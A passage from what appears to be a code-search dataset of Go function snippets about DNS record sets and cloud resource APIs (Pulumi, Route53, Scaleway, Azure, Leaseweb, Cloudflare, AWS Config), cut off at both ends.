nil\n\t}\n\n\treturn &r, nil\n}", "func (o LookupResourceSetResultOutput) Resources() ResourceSetResourceArrayOutput {\n\treturn o.ApplyT(func(v LookupResourceSetResult) []ResourceSetResource { return v.Resources }).(ResourceSetResourceArrayOutput)\n}", "func (s *dnsRecordSetLister) List(selector labels.Selector) (ret []*v1alpha1.DnsRecordSet, err error) {\n\terr = cache.ListAll(s.indexer, selector, func(m interface{}) {\n\t\tret = append(ret, m.(*v1alpha1.DnsRecordSet))\n\t})\n\treturn ret, err\n}", "func GetZones(full bool, tenant string) []Zone {\n\ttenantStr := func() string {\n\t\tif len(tenant) == 0 {\n\t\t\treturn \"\"\n\t\t}\n\t\treturn \"-tenant=\" + tenant\n\t}()\n\tfullStr := func() string {\n\t\tif full {\n\t\t\treturn \"-full\"\n\t\t}\n\t\treturn \"\"\n\t}()\n\n\toutput := RunCmd(fmt.Sprintf(\"%s api -fetch-zone-apps %s %s\", ActlPath, fullStr, tenantStr))\n\tlistOfZones := []Zone{}\n\tyaml.Unmarshal([]byte(output), &listOfZones)\n\treturn listOfZones\n}", "func (*AwsRoute53RecordImporter) Describe(meta interface{}) ([]*core.Instance, error) {\n\tsvc := meta.(*AWSClient).r53conn\n\n\t// Add code to list resources here\n\tzones := make([]*route53.HostedZone, 0)\n\terr := svc.ListHostedZonesPages(nil, func(o *route53.ListHostedZonesOutput, lastPage bool) bool {\n\t\tfor _, i := range o.HostedZones {\n\t\t\tzones = append(zones, i)\n\t\t}\n\t\treturn true // continue paging\n\t})\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Add code to list resources here\n\tinstances := make([]*core.Instance, 0)\n\tfor _, zone := range zones {\n\t\tinput := route53.ListResourceRecordSetsInput{\n\t\t\tHostedZoneId: zone.Id,\n\t\t}\n\n\t\trecords := make([]*route53.ResourceRecordSet, 0)\n\t\terr := svc.ListResourceRecordSetsPages(&input, func(o *route53.ListResourceRecordSetsOutput, lastPage bool) bool {\n\t\t\trecords = append(records, o.ResourceRecordSets...)\n\t\t\treturn true\n\t\t})\n\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tfor _, record := range records {\n\t\t\tid := aws.StringValue(zone.Id) + \"_\" + aws.StringValue(record.Name) + \"_\" + aws.StringValue(record.Type)\n\t\t\tif record.SetIdentifier != nil {\n\t\t\t\tid = id + \"_\" + aws.StringValue(record.SetIdentifier)\n\t\t\t}\n\n\t\t\tinstances = append(instances, &core.Instance{\n\t\t\t\tName: id,\n\t\t\t\tID: id,\n\t\t\t})\n\n\t\t}\n\t}\n\treturn instances, nil\n}", "func GetPrivateRecordSet(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *PrivateRecordSetState, opts ...pulumi.ResourceOption) (*PrivateRecordSet, error) {\n\tvar resource PrivateRecordSet\n\terr := ctx.ReadResource(\"azure-native:network/v20200101:PrivateRecordSet\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func newRecordSetsClient(subscriptionID string, baseURI string, authorizer autorest.Authorizer) privatedns.RecordSetsClient {\n\trecordsClient := privatedns.NewRecordSetsClientWithBaseURI(baseURI, subscriptionID)\n\tazure.SetAutoRestClientDefaults(&recordsClient.Client, authorizer)\n\treturn recordsClient\n}", "func (c Client) GetRecords(ctx context.Context, hostname, recordType string) ([]DNSRecord, error) {\n\tendpoint := c.baseURL.JoinPath(\"dns\", \"record\", hostname)\n\n\tquery := endpoint.Query()\n\tquery.Set(\"recordType\", recordType)\n\tendpoint.RawQuery = query.Encode()\n\n\tapiResp := RecordsResponse{}\n\terr := c.doRetry(ctx, http.MethodGet, endpoint.String(), nil, &apiResp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif apiResp.StatusCode/100 != 2 {\n\t\treturn nil, fmt.Errorf(\"API error: %w\", apiResp.APIException)\n\t}\n\n\treturn apiResp.DNSRecords, nil\n}", "func (s *API) ListDNSZoneRecords(req *ListDNSZoneRecordsRequest, opts ...scw.RequestOption) (*ListDNSZoneRecordsResponse, error) {\n\tvar err error\n\n\tdefaultPageSize, exist := s.client.GetDefaultPageSize()\n\tif (req.PageSize == nil || *req.PageSize == 0) && exist {\n\t\treq.PageSize = &defaultPageSize\n\t}\n\n\tquery := url.Values{}\n\tparameter.AddToQuery(query, \"project_id\", req.ProjectID)\n\tparameter.AddToQuery(query, \"order_by\", req.OrderBy)\n\tparameter.AddToQuery(query, \"page\", req.Page)\n\tparameter.AddToQuery(query, \"page_size\", req.PageSize)\n\tparameter.AddToQuery(query, \"name\", req.Name)\n\tparameter.AddToQuery(query, \"type\", req.Type)\n\tparameter.AddToQuery(query, \"id\", req.ID)\n\n\tif fmt.Sprint(req.DNSZone) == \"\" {\n\t\treturn nil, errors.New(\"field DNSZone cannot be empty in request\")\n\t}\n\n\tscwReq := &scw.ScalewayRequest{\n\t\tMethod: \"GET\",\n\t\tPath: \"/domain/v2beta1/dns-zones/\" + fmt.Sprint(req.DNSZone) + \"/records\",\n\t\tQuery: query,\n\t\tHeaders: http.Header{},\n\t}\n\n\tvar resp ListDNSZoneRecordsResponse\n\n\terr = s.client.Do(scwReq, &resp, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resp, nil\n}", "func NewRecordSet(ctx *pulumi.Context,\n\tname string, args *RecordSetArgs, opts ...pulumi.ResourceOption) (*RecordSet, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.ManagedZone == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'ManagedZone'\")\n\t}\n\tif args.Name == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'Name'\")\n\t}\n\tif args.Type == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'Type'\")\n\t}\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource RecordSet\n\terr := ctx.RegisterResource(\"gcp:dns/recordSet:RecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func getResources() []EmbeddedResource {\n\treturn RESOURCES\n}", "func main() {\n\n\t// Create new provider instance\n\tprovider := azure.Provider{\n\t\tTenantId: os.Getenv(\"AZURE_TENANT_ID\"),\n\t\tClientId: os.Getenv(\"AZURE_CLIENT_ID\"),\n\t\tClientSecret: os.Getenv(\"AZURE_CLIENT_SECRET\"),\n\t\tSubscriptionId: os.Getenv(\"AZURE_SUBSCRIPTION_ID\"),\n\t\tResourceGroupName: os.Getenv(\"AZURE_RESOURCE_GROUP_NAME\"),\n\t}\n\tzone := os.Getenv(\"AZURE_DNS_ZONE_FQDN\")\n\n\t// List existing records\n\tfmt.Printf(\"(1) List existing records\\n\")\n\tcurrentRecords, err := provider.GetRecords(context.TODO(), zone)\n\tif err != nil {\n\t\tfmt.Printf(\"%v\\n\", err)\n\t\treturn\n\t}\n\tfor _, record := range currentRecords {\n\t\tfmt.Printf(\"Exists: %v\\n\", record)\n\t}\n\n\t// Define test records\n\ttestRecords := []libdns.Record{\n\t\tlibdns.Record{\n\t\t\tType: \"A\",\n\t\t\tName: \"record-a\",\n\t\t\tValue: \"127.0.0.1\",\n\t\t\tTTL: time.Duration(30) * time.Second,\n\t\t},\n\t\tlibdns.Record{\n\t\t\tType: \"AAAA\",\n\t\t\tName: \"record-aaaa\",\n\t\t\tValue: \"::1\",\n\t\t\tTTL: time.Duration(31) * time.Second,\n\t\t},\n\t\tlibdns.Record{\n\t\t\tType: \"CAA\",\n\t\t\tName: \"record-caa\",\n\t\t\tValue: \"0 issue 'ca.\" + zone + \"'\",\n\t\t\tTTL: time.Duration(32) * time.Second,\n\t\t},\n\t\tlibdns.Record{\n\t\t\tType: \"CNAME\",\n\t\t\tName: \"record-cname\",\n\t\t\tValue: \"www.\" + zone,\n\t\t\tTTL: time.Duration(33) * time.Second,\n\t\t},\n\t\tlibdns.Record{\n\t\t\tType: \"MX\",\n\t\t\tName: \"record-mx\",\n\t\t\tValue: \"10 mail.\" + zone,\n\t\t\tTTL: time.Duration(34) * time.Second,\n\t\t},\n\t\t// libdns.Record{\n\t\t// \tType: \"NS\",\n\t\t// \tName: \"@\",\n\t\t// \tValue: \"ns1.example.com.\",\n\t\t// \tTTL: time.Duration(35) * time.Second,\n\t\t// },\n\t\tlibdns.Record{\n\t\t\tType: \"PTR\",\n\t\t\tName: \"record-ptr\",\n\t\t\tValue: \"hoge.\" + zone,\n\t\t\tTTL: time.Duration(36) * time.Second,\n\t\t},\n\t\t// libdns.Record{\n\t\t// \tType: \"SOA\",\n\t\t// \tName: \"@\",\n\t\t// \tValue: \"ns1.example.com. hostmaster.\" + zone + \" 1 7200 900 1209600 86400\",\n\t\t// \tTTL: time.Duration(37) * time.Second,\n\t\t// },\n\t\tlibdns.Record{\n\t\t\tType: \"SRV\",\n\t\t\tName: \"record-srv\",\n\t\t\tValue: \"1 10 5269 app.\" + zone,\n\t\t\tTTL: time.Duration(38) * time.Second,\n\t\t},\n\t\tlibdns.Record{\n\t\t\tType: \"TXT\",\n\t\t\tName: \"record-txt\",\n\t\t\tValue: \"TEST VALUE\",\n\t\t\tTTL: time.Duration(39) * time.Second,\n\t\t}}\n\n\t// Create new records\n\tfmt.Printf(\"(2) Create new records\\n\")\n\tcreatedRecords, err := provider.AppendRecords(context.TODO(), zone, testRecords)\n\tif err != nil {\n\t\tfmt.Printf(\"%v\\n\", err)\n\t\treturn\n\t}\n\tfor _, record := range createdRecords {\n\t\tfmt.Printf(\"Created: %v\\n\", record)\n\t}\n\n\t// Update new records\n\tfmt.Printf(\"(3) Update newly added records\\n\")\n\tupdatedRecords, err := provider.SetRecords(context.TODO(), zone, testRecords)\n\tif err != nil {\n\t\tfmt.Printf(\"%v\\n\", err)\n\t\treturn\n\t}\n\tfor _, record := range updatedRecords {\n\t\tfmt.Printf(\"Updated: %v\\n\", record)\n\t}\n\n\t// Delete new records\n\tfmt.Printf(\"(4) Delete newly added records\\n\")\n\tdeletedRecords, err := provider.DeleteRecords(context.TODO(), zone, testRecords)\n\tif err != nil {\n\t\tfmt.Printf(\"%v\\n\", err)\n\t\treturn\n\t}\n\tfor _, record := range deletedRecords {\n\t\tfmt.Printf(\"Deleted: %v\\n\", record)\n\t}\n\n}", "func (p *Provider) AppendRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\tvar addedRecords []libdns.Record\n\n\tfor _, record := range records {\n\t\tbody := &LeasewebRecordSet{\n\t\t\tName: record.Name,\n\t\t\tType: record.Type,\n\t\t\tContent: []string{record.Value},\n\t\t\tTTL: int(record.TTL.Seconds()),\n\t\t}\n\n\t\tbodyBuffer := new(bytes.Buffer)\n\t\tjson.NewEncoder(bodyBuffer).Encode(body)\n\n\t\treq, err := http.NewRequest(http.MethodPost, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), bodyBuffer)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\t\tres, err := client.Do(req)\n\t\tdefer res.Body.Close()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t\t}\n\n\t\taddedRecords = append(addedRecords, record)\n\t}\n\n\treturn addedRecords, nil\n}", "func (p *hostingdeProvider) Resources(_ context.Context) []func() resource.Resource {\n\treturn []func() resource.Resource{\n\t\tNewZoneResource,\n\t\tNewRecordResource,\n\t}\n}", "func ExampleEnvironmentsClient_ListByResourceGroup() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armtimeseriesinsights.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := clientFactory.NewEnvironmentsClient().ListByResourceGroup(ctx, \"rg1\", nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.EnvironmentListResponse = armtimeseriesinsights.EnvironmentListResponse{\n\t// \tValue: []armtimeseriesinsights.EnvironmentResourceClassification{\n\t// \t\t&armtimeseriesinsights.Gen1EnvironmentResource{\n\t// \t\t\tName: to.Ptr(\"env1\"),\n\t// \t\t\tType: to.Ptr(\"Microsoft.TimeSeriesInsights/Environments\"),\n\t// \t\t\tID: to.Ptr(\"/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.TimeSeriesInsights/Environments/env1\"),\n\t// \t\t\tLocation: to.Ptr(\"West US\"),\n\t// \t\t\tTags: map[string]*string{\n\t// \t\t\t},\n\t// \t\t\tKind: to.Ptr(armtimeseriesinsights.EnvironmentResourceKindGen1),\n\t// \t\t\tSKU: &armtimeseriesinsights.SKU{\n\t// \t\t\t\tName: to.Ptr(armtimeseriesinsights.SKUNameS1),\n\t// \t\t\t\tCapacity: to.Ptr[int32](1),\n\t// \t\t\t},\n\t// \t\t\tProperties: &armtimeseriesinsights.Gen1EnvironmentResourceProperties{\n\t// \t\t\t\tCreationTime: to.Ptr(func() time.Time { t, _ := time.Parse(time.RFC3339Nano, \"2017-04-18T19:20:33.2288820Z\"); return t}()),\n\t// \t\t\t\tProvisioningState: to.Ptr(armtimeseriesinsights.ProvisioningStateSucceeded),\n\t// \t\t\t\tDataRetentionTime: to.Ptr(\"P31D\"),\n\t// \t\t\t},\n\t// \t}},\n\t// }\n}", "func (z *Zone) GetStaticRecordList() ([]*StaticRecord) {\n\tmutableMutex.Lock()\n\tdefer mutableMutex.Unlock()\n\tif z.StaticRecordList == nil {\n\t\tz.StaticRecordList = make([]*StaticRecord, 0)\n\t}\n\tnewStaticRecordList := make([]*StaticRecord, len(z.StaticRecordList))\n\tcopy(newStaticRecordList, z.StaticRecordList)\n\treturn newStaticRecordList\n}", "func (parser *MRCPParser) MRCPParserResourceSet(name string) {\n\n}", "func (s *API) ListDNSZoneRecords(req *ListDNSZoneRecordsRequest, opts ...scw.RequestOption) (*ListDNSZoneRecordsResponse, error) {\n\tvar err error\n\n\tdefaultPageSize, exist := s.client.GetDefaultPageSize()\n\tif (req.PageSize == nil || *req.PageSize == 0) && exist {\n\t\treq.PageSize = &defaultPageSize\n\t}\n\n\tquery := url.Values{}\n\tparameter.AddToQuery(query, \"page\", req.Page)\n\tparameter.AddToQuery(query, \"page_size\", req.PageSize)\n\tparameter.AddToQuery(query, \"order_by\", req.OrderBy)\n\tparameter.AddToQuery(query, \"name\", req.Name)\n\tparameter.AddToQuery(query, \"type\", req.Type)\n\tparameter.AddToQuery(query, \"organization_id\", req.OrganizationID)\n\n\tif fmt.Sprint(req.DNSZone) == \"\" {\n\t\treturn nil, errors.New(\"field DNSZone cannot be empty in request\")\n\t}\n\n\tscwReq := &scw.ScalewayRequest{\n\t\tMethod: \"GET\",\n\t\tPath: \"/domain/v2alpha2/dns-zones/\" + fmt.Sprint(req.DNSZone) + \"/records\",\n\t\tQuery: query,\n\t\tHeaders: http.Header{},\n\t}\n\n\tvar resp ListDNSZoneRecordsResponse\n\n\terr = s.client.Do(scwReq, &resp, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resp, nil\n}", "func (p *F5DNSLBProvider) Records(ctx context.Context) ([]*endpoint.Endpoint, error) {\n\t// If not present return empty\n\t// else find all A pool-members from the pool\n\tlog.Println(\"Records invoked\")\n\tsubs, err := p.GetFilteredDNSConfig()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\trecords := p.TransformToRecords(subs)\n\treturn records, nil\n}", "func (api *API) ListDNSRecords(ctx context.Context, rc *ResourceContainer, params ListDNSRecordsParams) ([]DNSRecord, *ResultInfo, error) {\n\tif rc.Identifier == \"\" {\n\t\treturn nil, nil, ErrMissingZoneID\n\t}\n\n\tparams.Name = toUTS46ASCII(params.Name)\n\n\tautoPaginate := true\n\tif params.PerPage >= 1 || params.Page >= 1 {\n\t\tautoPaginate = false\n\t}\n\n\tif params.PerPage < 1 {\n\t\tparams.PerPage = listDNSRecordsDefaultPageSize\n\t}\n\n\tif params.Page < 1 {\n\t\tparams.Page = 1\n\t}\n\n\tvar records []DNSRecord\n\tvar lastResultInfo ResultInfo\n\n\tfor {\n\t\turi := buildURI(fmt.Sprintf(\"/zones/%s/dns_records\", rc.Identifier), params)\n\t\tres, err := api.makeRequestContext(ctx, http.MethodGet, uri, nil)\n\t\tif err != nil {\n\t\t\treturn []DNSRecord{}, &ResultInfo{}, err\n\t\t}\n\t\tvar listResponse DNSListResponse\n\t\terr = json.Unmarshal(res, &listResponse)\n\t\tif err != nil {\n\t\t\treturn []DNSRecord{}, &ResultInfo{}, fmt.Errorf(\"%s: %w\", errUnmarshalError, err)\n\t\t}\n\t\trecords = append(records, listResponse.Result...)\n\t\tlastResultInfo = listResponse.ResultInfo\n\t\tparams.ResultInfo = listResponse.ResultInfo.Next()\n\t\tif params.ResultInfo.Done() || !autoPaginate {\n\t\t\tbreak\n\t\t}\n\t}\n\treturn records, &lastResultInfo, nil\n}", "func NewRecordSet(ctx *pulumi.Context,\n\tname string, args *RecordSetArgs, opts ...pulumi.ResourceOption) (*RecordSet, error) {\n\tif args == nil || args.ManagedZone == nil {\n\t\treturn nil, errors.New(\"missing required argument 'ManagedZone'\")\n\t}\n\tif args == nil || args.Rrdatas == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Rrdatas'\")\n\t}\n\tif args == nil || args.Ttl == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Ttl'\")\n\t}\n\tif args == nil || args.Type == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Type'\")\n\t}\n\tif args == nil {\n\t\targs = &RecordSetArgs{}\n\t}\n\tvar resource RecordSet\n\terr := ctx.RegisterResource(\"gcp:dns/recordSet:RecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (o LookupRegionCommitmentResultOutput) Resources() ResourceCommitmentResponseArrayOutput {\n\treturn o.ApplyT(func(v LookupRegionCommitmentResult) []ResourceCommitmentResponse { return v.Resources }).(ResourceCommitmentResponseArrayOutput)\n}", "func getAvailabilitySetsClient(resourceManagerEndpoint, subscriptionID string, authorizer autorest.Authorizer) compute.AvailabilitySetsClient {\n\tavailabilitySetClient := compute.NewAvailabilitySetsClientWithBaseURI(resourceManagerEndpoint, subscriptionID)\n\tavailabilitySetClient.Authorizer = authorizer\n\tavailabilitySetClient.AddToUserAgent(azure.UserAgent)\n\treturn availabilitySetClient\n}", "func (client ReferenceDataSetsClient) ListByEnvironmentPreparer(ctx context.Context, resourceGroupName string, environmentName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"environmentName\": autorest.Encode(\"path\", environmentName),\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2020-05-15\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TimeSeriesInsights/environments/{environmentName}/referenceDataSets\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func listDataSets(w http.ResponseWriter, r *http.Request) {\n\torgID := domain.GetOrganizationID(r)\n\n\tsets, err := models.ListDataSets(orgID.String())\n\tif err != nil {\n\t\trender.Error(w, r, err, &render.ErrorConfig{\n\t\t\tStatusCode: http.StatusInternalServerError,\n\t\t\tMessage: \"Unable to list datasets\",\n\t\t})\n\n\t\treturn\n\t}\n\n\tif strings.EqualFold(r.URL.Query().Get(\"applyPreSave\"), \"true\") {\n\t\ttotal := len(sets)\n\n\t\tfor idx, ds := range sets {\n\t\t\tif err := ds.Save(); err != nil {\n\t\t\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tif idx%250 == 0 && idx > 0 {\n\t\t\t\tlog.Printf(\"presaved %d of %d\", idx, total)\n\t\t\t}\n\t\t}\n\t}\n\n\trender.Status(r, http.StatusOK)\n\trender.JSON(w, r, sets)\n}", "func (s *ResourcesService) List(ctx context.Context, realm, clientID string) ([]*Resource, *http.Response, error) {\n\tu := fmt.Sprintf(\"admin/realms/%s/clients/%s/authz/resource-server/resource\", realm, clientID)\n\treq, err := s.keycloak.NewRequest(http.MethodGet, u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar resources []*Resource\n\tres, err := s.keycloak.Do(ctx, req, &resources)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treturn resources, res, nil\n}", "func (s dnsRecordSetNamespaceLister) List(selector labels.Selector) (ret []*v1alpha1.DnsRecordSet, err error) {\n\terr = cache.ListAllByNamespace(s.indexer, s.namespace, selector, func(m interface{}) {\n\t\tret = append(ret, m.(*v1alpha1.DnsRecordSet))\n\t})\n\treturn ret, err\n}", "func (c *CfgSvc) GetDiscoveredResources() ([]*configservice.ResourceIdentifier, error) {\n\t// List of resource types pulled from\n\t// github.com/aws/aws-sdk-go/models/apis/config/2014-11-12/api-2.json\n\tvar resourceTypes = [...]string{\n\t\t\"AWS::AppStream::DirectoryConfig\",\n\t\t\"AWS::AppStream::Application\",\n\t\t\"AWS::AppFlow::Flow\",\n\t\t\"AWS::ApiGateway::Stage\",\n\t\t\"AWS::ApiGateway::RestApi\",\n\t\t\"AWS::ApiGatewayV2::Stage\",\n\t\t\"AWS::ApiGatewayV2::Api\",\n\t\t\"AWS::Athena::WorkGroup\",\n\t\t\"AWS::Athena::DataCatalog\",\n\t\t\"AWS::CloudFront::Distribution\",\n\t\t\"AWS::CloudFront::StreamingDistribution\",\n\t\t\"AWS::CloudWatch::Alarm\",\n\t\t\"AWS::CloudWatch::MetricStream\",\n\t\t\"AWS::RUM::AppMonitor\",\n\t\t\"AWS::Evidently::Project\",\n\t\t\"AWS::CodeGuruReviewer::RepositoryAssociation\",\n\t\t\"AWS::Connect::PhoneNumber\",\n\t\t\"AWS::CustomerProfiles::Domain\",\n\t\t\"AWS::Detective::Graph\",\n\t\t\"AWS::DynamoDB::Table\",\n\t\t\"AWS::EC2::Host\",\n\t\t\"AWS::EC2::EIP\",\n\t\t\"AWS::EC2::Instance\",\n\t\t\"AWS::EC2::NetworkInterface\",\n\t\t\"AWS::EC2::SecurityGroup\",\n\t\t\"AWS::EC2::NatGateway\",\n\t\t\"AWS::EC2::EgressOnlyInternetGateway\",\n\t\t\"AWS::EC2::EC2Fleet\",\n\t\t\"AWS::EC2::SpotFleet\",\n\t\t\"AWS::EC2::PrefixList\",\n\t\t\"AWS::EC2::FlowLog\",\n\t\t\"AWS::EC2::TransitGateway\",\n\t\t\"AWS::EC2::TransitGatewayAttachment\",\n\t\t\"AWS::EC2::TransitGatewayRouteTable\",\n\t\t\"AWS::EC2::VPCEndpoint\",\n\t\t\"AWS::EC2::VPCEndpointService\",\n\t\t\"AWS::EC2::VPCPeeringConnection\",\n\t\t\"AWS::EC2::RegisteredHAInstance\",\n\t\t\"AWS::EC2::SubnetRouteTableAssociation\",\n\t\t\"AWS::EC2::LaunchTemplate\",\n\t\t\"AWS::EC2::NetworkInsightsAccessScopeAnalysis\",\n\t\t\"AWS::EC2::TrafficMirrorTarget\",\n\t\t\"AWS::EC2::TrafficMirrorSession\",\n\t\t\"AWS::EC2::DHCPOptions\",\n\t\t\"AWS::EC2::IPAM\",\n\t\t\"AWS::EC2::NetworkInsightsPath\",\n\t\t\"AWS::EC2::TrafficMirrorFilter\",\n\t\t\"AWS::EC2::Volume\",\n\t\t\"AWS::ImageBuilder::ImagePipeline\",\n\t\t\"AWS::ImageBuilder::DistributionConfiguration\",\n\t\t\"AWS::ImageBuilder::InfrastructureConfiguration\",\n\t\t\"AWS::ECR::Repository\",\n\t\t\"AWS::ECR::RegistryPolicy\",\n\t\t\"AWS::ECR::PullThroughCacheRule\",\n\t\t\"AWS::ECR::PublicRepository\",\n\t\t\"AWS::ECS::Cluster\",\n\t\t\"AWS::ECS::TaskDefinition\",\n\t\t\"AWS::ECS::Service\",\n\t\t\"AWS::ECS::TaskSet\",\n\t\t\"AWS::EFS::FileSystem\",\n\t\t\"AWS::EFS::AccessPoint\",\n\t\t\"AWS::EKS::Cluster\",\n\t\t\"AWS::EKS::FargateProfile\",\n\t\t\"AWS::EKS::IdentityProviderConfig\",\n\t\t\"AWS::EKS::Addon\",\n\t\t\"AWS::EMR::SecurityConfiguration\",\n\t\t\"AWS::Events::EventBus\",\n\t\t\"AWS::Events::ApiDestination\",\n\t\t\"AWS::Events::Archive\",\n\t\t\"AWS::Events::Endpoint\",\n\t\t\"AWS::Events::Connection\",\n\t\t\"AWS::Events::Rule\",\n\t\t\"AWS::EC2::TrafficMirrorSession\",\n\t\t\"AWS::EventSchemas::RegistryPolicy\",\n\t\t\"AWS::EventSchemas::Discoverer\",\n\t\t\"AWS::EventSchemas::Schema\",\n\t\t\"AWS::Forecast::Dataset\",\n\t\t\"AWS::FraudDetector::Label\",\n\t\t\"AWS::FraudDetector::EntityType\",\n\t\t\"AWS::FraudDetector::Variable\",\n\t\t\"AWS::FraudDetector::Outcome\",\n\t\t\"AWS::GuardDuty::Detector\",\n\t\t\"AWS::GuardDuty::ThreatIntelSet\",\n\t\t\"AWS::GuardDuty::IPSet\",\n\t\t\"AWS::GuardDuty::Filter\",\n\t\t\"AWS::HealthLake::FHIRDatastore\",\n\t\t\"AWS::Cassandra::Keyspace\",\n\t\t\"AWS::IVS::Channel\",\n\t\t\"AWS::IVS::RecordingConfiguration\",\n\t\t\"AWS::IVS::PlaybackKeyPair\",\n\t\t\"AWS::Elasticsearch::Domain\",\n\t\t\"AWS::OpenSearch::Domain\",\n\t\t\"AWS::Elasticsearch::Domain\",\n\t\t\"AWS::Pinpoint::ApplicationSettings\",\n\t\t\"AWS::Pinpoint::Segment\",\n\t\t\"AWS::Pinpoint::App\",\n\t\t\"AWS::Pinpoint::Campaign\",\n\t\t\"AWS::Pinpoint::InAppTemplate\",\n\t\t\"AWS::QLDB::Ledger\",\n\t\t\"AWS::Kinesis::Stream\",\n\t\t\"AWS::Kinesis::StreamConsumer\",\n\t\t\"AWS::KinesisAnalyticsV2::Application\",\n\t\t\"AWS::KinesisFirehose::DeliveryStream\",\n\t\t\"AWS::KinesisVideo::SignalingChannel\",\n\t\t\"AWS::Lex::BotAlias\",\n\t\t\"AWS::Lex::Bot\",\n\t\t\"AWS::Lightsail::Disk\",\n\t\t\"AWS::Lightsail::Certificate\",\n\t\t\"AWS::Lightsail::Bucket\",\n\t\t\"AWS::Lightsail::StaticIp\",\n\t\t\"AWS::LookoutMetrics::Alert\",\n\t\t\"AWS::LookoutVision::Project\",\n\t\t\"AWS::AmazonMQ::Broker\",\n\t\t\"AWS::MSK::Cluster\",\n\t\t\"AWS::Redshift::Cluster\",\n\t\t\"AWS::Redshift::ClusterParameterGroup\",\n\t\t\"AWS::Redshift::ClusterSecurityGroup\",\n\t\t\"AWS::Redshift::ScheduledAction\",\n\t\t\"AWS::Redshift::ClusterSnapshot\",\n\t\t\"AWS::Redshift::ClusterSubnetGroup\",\n\t\t\"AWS::Redshift::EventSubscription\",\n\t\t\"AWS::RDS::DBInstance\",\n\t\t\"AWS::RDS::DBSecurityGroup\",\n\t\t\"AWS::RDS::DBSnapshot\",\n\t\t\"AWS::RDS::DBSubnetGroup\",\n\t\t\"AWS::RDS::EventSubscription\",\n\t\t\"AWS::RDS::DBCluster\",\n\t\t\"AWS::RDS::DBClusterSnapshot\",\n\t\t\"AWS::RDS::GlobalCluster\",\n\t\t\"AWS::Route53::HostedZone\",\n\t\t\"AWS::Route53::HealthCheck\",\n\t\t\"AWS::Route53Resolver::ResolverEndpoint\",\n\t\t\"AWS::Route53Resolver::ResolverRule\",\n\t\t\"AWS::Route53Resolver::ResolverRuleAssociation\",\n\t\t\"AWS::Route53Resolver::FirewallDomainList\",\n\t\t\"AWS::AWS::Route53Resolver::FirewallRuleGroupAssociation\",\n\t\t\"AWS::Route53RecoveryReadiness::Cell\",\n\t\t\"AWS::Route53RecoveryReadiness::ReadinessCheck\",\n\t\t\"AWS::Route53RecoveryReadiness::RecoveryGroup\",\n\t\t\"AWS::Route53RecoveryControl::Cluster\",\n\t\t\"AWS::Route53RecoveryControl::ControlPanel\",\n\t\t\"AWS::Route53RecoveryControl::RoutingControl\",\n\t\t\"AWS::Route53RecoveryControl::SafetyRule\",\n\t\t\"AWS::Route53RecoveryReadiness::ResourceSet\",\n\t\t\"AWS::SageMaker::CodeRepository\",\n\t\t\"AWS::SageMaker::Domain\",\n\t\t\"AWS::SageMaker::AppImageConfig\",\n\t\t\"AWS::SageMaker::Image\",\n\t\t\"AWS::SageMaker::Model\",\n\t\t\"AWS::SageMaker::NotebookInstance\",\n\t\t\